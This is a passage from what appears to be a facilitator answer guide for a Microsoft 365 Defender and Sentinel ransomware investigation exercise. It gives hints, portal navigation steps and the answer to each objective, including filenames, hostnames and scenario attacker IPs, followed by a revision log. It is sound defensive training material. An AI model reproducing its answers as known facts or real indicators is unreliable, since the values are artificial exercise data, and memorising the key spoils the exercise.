commands, Microsoft 365 Defender is going to be the best place to look. Defender
for Endpoint gathers information about what takes place on onboarded endpoints
and performs correlation to make analysis more efficient.
While the original email attachment wasn't considered malicious itself, Defender for
Endpoint still recognizes download and execution behavior by Microsoft Word as
suspicious. Therefore, we can find alerts that break down the sequence of events
that led to the callback malware being created on the endpoint and executed.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then view the list of related alerts. Look for an alert that references Office
running suspicious commands. Scroll through that Alert Story to find an event where
PowerShell executed a script immediately followed by the execution of a uniquely
named executable.
*Note: The name of the alert may change over time due to how M365D analytics works. For example. the alert
may refer to “privilege escalation and ransomware" or "'initial access and exfiltration", however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
4axxl10r.exe
Automation For the Win - On which endpoint could Microsoft 365 Defender Automated
Investigations remediate the detection of a Meterpreter post-exploitation tool?
For additional information about the tools and features that might be helpful,
reference the "Automated investigation and response in Microsoft 365 Defender" link
in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com
Automated investigations that are triggered by alerts can be analyzed to see how
Defender 365 identified these alerts and more importantly, if they were remediated
or are pending analyst approval of actions.
Viewing the investigations that relate to privilege escalation incidents will help
quickly identify the suspicious activity and how it was handled by the system. For
more detailed information, you can select this investigation and view a graph which
shows all alert activity related to this end point.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then select the Investigations tab. One investigation will reference a
ransomware infection being prevented. You can use the “Triggering alert” or “Status”
filters to find the answer more easily. The answer to this question can be seen in the
Entities column, or by opening the investigation page and reviewing the graph or
Devices tab.
Note: Depending on the Azure data refresh cycle, the answer to this objective will sometimes be “floor-3-desk”
and other times it will be “picu-5”. Please advise your players accordingly.
Getting Their Bearings - What system tool did the attacker use to enumerate active network
connections?
Once they achieved initial access, the attacker sought to get the lay of the land and
identify endpoints to move laterally. DNS enumeration is a common technique for
this, as it can tell attackers the hostnames and IP addresses for endpoints across the
domain. Attackers love to use tools that already exist in the victim environment when
they can, a technique referred to as "living off the land." Doing so can help them
blend in with normal activities. Even if their usage of a particular tool triggers an alert,
security practitioners are used to false positives caused by their own administration
activities.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
As we're looking for evidence about the execution of commands, Microsoft 365
Defender is going to be the best place to look. Defender for Endpoint gathers
information about what takes place on onboarded endpoints and performs
correlation to make analysis more efficient.
In this scenario, the attacker leveraged a system tool commonly used for displaying
active network connections for this endpoint. To find evidence we can look at alerts
in Microsoft 365 Defender. The tool itself wasn't flagged as malicious or anything, but
the contextual behavior was considered suspicious by Defender.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then view the list of related alerts. Look for an alert that references the
suspicious discovery of network connections. Read through the Alert Story until you
find an event for the execution of a system tool for displaying network statistics with
relevance to the alert.
netstat.exe
Hey, That's My Data! What is the filename of the archive exfiltrated by the attacker?
For additional information about the tools and features that might be helpful,
reference the "Proactively hunt for threats with advanced hunting” link in the
Documentation folder on your Analyst desktop.
During their discovery once they achieved initial access, the attacker came across
some potentially valuable data. By exfiltrating it, they could use it to try to extort a
higher ransom payment than ransomware alone might've gotten. Unfortunately, this
is becoming a common practice alongside ransomware in order to put more pressure
on organizations to pay up. A great backup and restoration process might save you
from ransomware, but it can't delete your data from the attacker's device.
Fortunately, Microsoft 365 Defender knows what normal data sharing looks like. By
attempting to blend in with DNS network traffic, the attacker actually generated host
events. It isn't considered normal for large amounts of data to be passed over DNS,
and Defender for Endpoint also recognized the command used to perform the
exfiltration contained the name of a local file.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents and Alerts.
Look for the incident concerning privilege escalation and ransomware. Open that
incident, then view the list of related alerts. Look for an alert about data exfiltration.
Viewing the details, scroll through the Alert Story and look for an executable
performing exfiltration over DNS. The command used to execute that executable will
contain the filename of the archive being exfiltrated.
*Note: The name of the alert may change over time due to how M365D analytics works. For example. the alert
may refer to “privilege escalation and ransomware" or "'initial access and exfiltration", however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
UVMHealth_Data.zip
Moving onto the next phase of the investigation, let's start with a simple one that you
were just gathering details about. This is a common question during the reporting and
lessons learned phases of incident response, as its often seen as the key issue by
stakeholders. Simply put, how did they get in? While it's never the full story, its often
seen as the key issue as people assume that if they hadn't gotten in the rest of the attack
couldn't have happened. While that's true, we have to remember that attackers are
adaptive and will keep trying different methods until one works. While we're busy trying
to patch all the holes, they just need to find one.
For additional information about the tools and features that might be helpful, reference
the "Investigate incidents in Microsoft 365 Defender" link in the Documentation folder on
your Analyst desktop.
In addition to gathering and correlating events into alerts and incidents within each tool,
Microsoft 365 Defender also performs correlation across Defender for Endpoint,
Defender for Identity, and Email Protection. In this scenario, Microsoft 365 Defender was
able to connect the initial phishing emails to the callback malware via a Chain Event
Detection.
The Chain Event Detection tag means that Microsoft 365 Defender is corelating across
multiple data sources to connect what might have otherwise appeared to be unrelated
events. In this scenario, the previously-considered-benign email attachment is correlated
to the suspicious behavior exhibited by Microsoft Word.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts. Look
for the incident concerning privilege escalation and ransomware*. Open that incident,
then view the list of related alerts. The first alert in the chain gives a clue as to the source
of the initial compromise. Open the "Malicious email attachment" alert the choose “View
alert details” to view some additional alert details in the right-hand pane. The MITRE
ATT&CK Techniques section lists one technique specifically.
phishing
As we see in this scenario, it only took one user opening a bad attachment for the
rest of the attack path to be played out by the attacker. Recognizing that the
attacker's scope was broader than just one user is a good reminder of what we're up
against. In this environment, it was just seven other users, but in a real enterprise
environment its likely to be hundreds or thousands.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
In addition to gathering and correlating events into alerts and incidents within each
tool, Microsoft 365 Defender also performs correlation across Defender for Endpoint,
Defender for Identity, and Email Protection. In this scenario, Microsoft 365 Defender
was able to connect the initial phishing emails to the callback malware via a Chain
Event Detection. Even though none of the other recipients were successfully
compromised, Microsoft 365 Defender recognizes that they were also targeted.
The Chain Event Detection tag means that Microsoft 365 Defender is corelating
across multiple data sources to connect what might have otherwise appeared to be
unrelated events. In this scenario, the previously-considered-benign email
attachment is correlated to the suspicious behavior exhibited by Microsoft Word.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then view the list of related alerts. The first alert in the chain gives a clue as
to the source of the initial compromise. Open the “Malicious email attachment” alert,
there will be a box at the top with a count of accounts that received the malicious
attachment. Click on that box to view all accounts, and the answer will be everyone
except the user that was compromised.
Over the course of the ensuing attack, the attacker managed to gain access to
multiple endpoints. Gathering that information into one cohesive thought is handy to
have up your sleeve during discussions about the scope and impact of the attack, as
well as while you're planning security enhancement efforts. We're trying to put
everything we learned along the way together to fill out the context surrounding the
attack. We've gathered a lot of particulars and specifics, but now we need to
correlate across the phases to make sure we understand the full scope of the attack.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
With an incident's details you'll find a summary tab, but the Graph tab can be of great
help when trying to fully understand the scope of an incident. The Summary is great
for metrics, but the Graph tab is where we can see how the attack progressed, what
was impacted, and what indicators were detected by our security tools.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then view the Graph tab. Play the attack story, pausing or stepping through
as needed to see each lateral movement to a new endpoint appear in the graph after
the initial access endpoint.
floor-5-adm, dc01
Identifying all the user accounts compromised by the attacker is also important as
you evaluate everything the attacker was able to do and everything they could have
accessed. Those three accounts will certainly require remediation, and a greater
conversation will be necessary to determine whether a domain-wise password reset
is warranted.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
With an incident's details you'll find a summary tab, but the alerts tab can be of
greater interest to security practitioners. The Summary is great for metrics, but the
Alerts tab is where we can see how the attack progressed, what was impacted, and
what was detected or prevented by our security tools.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then view the list of related alerts. Scroll through the list and take note of
the Impacted Entities column, specifically looking for changes in the user account as
the attack progresses. Scroll through the Impacted Entities column to find all three
compromised accounts.
*Note: The name of the alert may change over time due to how M365D analytics works. For example. the alert
may refer to “privilege escalation and ransomware" or "'initial access and exfiltration", however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
For additional information about the tools and features that might be helpful,
reference the "Automate threat response with playbooks in Microsoft Sentinel" link in
the Documentation folder on your Analyst desktop.
Over the course of our investigation, we identified three lateral movement and
credential access techniques used by the attacker. As we consider remediation and
security enhancement efforts, we'll want to consider how to ensure those techniques
cannot be used against us in any future attacks.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
Some questions require multiple tools to answer. This time, in addition to leveraging
Microsoft 365 Defender, we also need to remember what Microsoft Sentinel
detected in the network traffic. Microsoft Sentinel's Analytics rules can analyze
network traffic for anomalies or concerning patterns.
To find what we need in Microsoft 365 Defender, we'll want to review the Incident
Alerts as well as the Email Quarantine. To find what we're looking for in Microsoft
Sentinel we need to review the Incidents.
This question requires a process of elimination, so here's how to find evidence for
each technique the attacker did use.
Password Hash Harvesting: In Microsoft 365 Defender, look for an alert for the
Mimikatz credential theft tool or Malicious credential theft tool execution. These
alerts are included in the Multi-stage incident involving Privilege escalation* including
Ransomware on multiple endpoints reported by multiple sources.
User Creation
Turning our focus to an important external factor, we'll also want to evaluate where
the attack originated from a network perspective. While blacklisting every single IP
address that scans your external IP range may be too tedious to maintain, blacklisting
the source of an attack is certainly warranted. While investigating the network traffic,
you may also discover evidence of reconnaissance being performed prior to the
attack. All of this information could contribute to effective network monitoring or
alerting changes.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
Once again, this answer could be found in either Microsoft 365 Defender or Microsoft
Sentinel. Think back through the investigation to consider at what points each IP
address might've been used by the attacker. The two IP addresses served different
purposes - one acted as the connection point for callbacks, the other provided a
download source for staging malware and tools.
Microsoft 365 Defender grabbed events containing each IP address from various
points in the attack. Alert stories reference each IP address, depending on what
activity they were used for. The alerts related to callback malware is likely to provide
one IP address, while alerts related to malware being downloaded and executed are
likely to contain the other. In Microsoft Sentinel we can review network traffic to find
each IP address. We could formulate queries about the first by recalling what ports
were being used by the callback malware, or by looking for external traffic during
specific timeframes from the internal compromised IP addresses. For the second, we
could formulate a query looking for web traffic from compromised endpoints, or for
the logs from the DNS exfiltration.
40.77.31.232, 23.99.191.12
Microsoft 365 Defender doesn't just offer preventative and reactive security, it also
can help guide effective security planning and prioritization. From Threat Analytics to
Vulnerability Management, the Defender portal provides insights from across your
environment and security tools.
For additional information about the tools and features that might be helpful,
reference the "Security recommendations - threat and vulnerability management" link
in the Documentation folder on your Analyst desktop.
1. Addition of Appendix A
2. Changes to the wording and solution for eight Learning Objectives, resulting in changes to
this document as well as the eight solution videos:
• Added a Note in Objective #17, Hint #4 mentioning that using Sentinel will not help the
player find the answer.
• Added a Note in Objective #18, Hint #4 on how to make the solution easier to find.
• Fixed Obj #2, Hint #4 changed – New description on finding the solution.
• Fixed Obj #3, Hint #4 changed – New description on finding the solution.
• Fixed Obj #4, Hint #3 and #4 changed – New descriptions on finding the solution.
• Fixed Obj #16, Hint #4 changed – New description on finding the solution.
• Fixed Obj #17, Hint #1 and Hint #4 changed – New descriptions on finding the solution.
• Fixed Obj #18, Hint #4 changed – New description on finding the solution.
• Fixed Obj #19, Hint #4 changed – New descriptions on finding the solution.
• Fixed Obj #26, Hint #4 changed – New description on finding the solution.
• New videos created for Objectives: 2, 3, 4, 16, 17, 18, 19, 26.
For 2022.07.28:
• Fixed Obj#12, Hint #4 changed – New description on finding the solution.
• Objectives 17 and 19 were removed. The original objective 21 was switched to be after the
original objective 22. Objectives 18 through the end were renumbered accordingly.
• Fixed Obj #2, Hint #4 changed – New description on finding the solution. Updated video.
• Fixed Obj #4, Hint #4 changed – New description on finding the solution. Updated video.
• Fixed Obj #12, Hint #4 changed – New description on finding the solution. Updated video.
• Fixed Obj #16, Hint #4 changed – New description on finding the solution. Updated video.
• Fixed Obj #2, Hint #4 changed – New description on finding the solution. Updated video.
• Fixed Obj’s #2, 3, 5, 6, 7, 8, 9, 10, 11, 13, 21, 22, 23, 24, 25, 26, 27 and 28 by adding special
wording around those Objectives that have this text in hint #4: “privilege escalation and
ransomware”. Recorded all new walkthrough videos for each.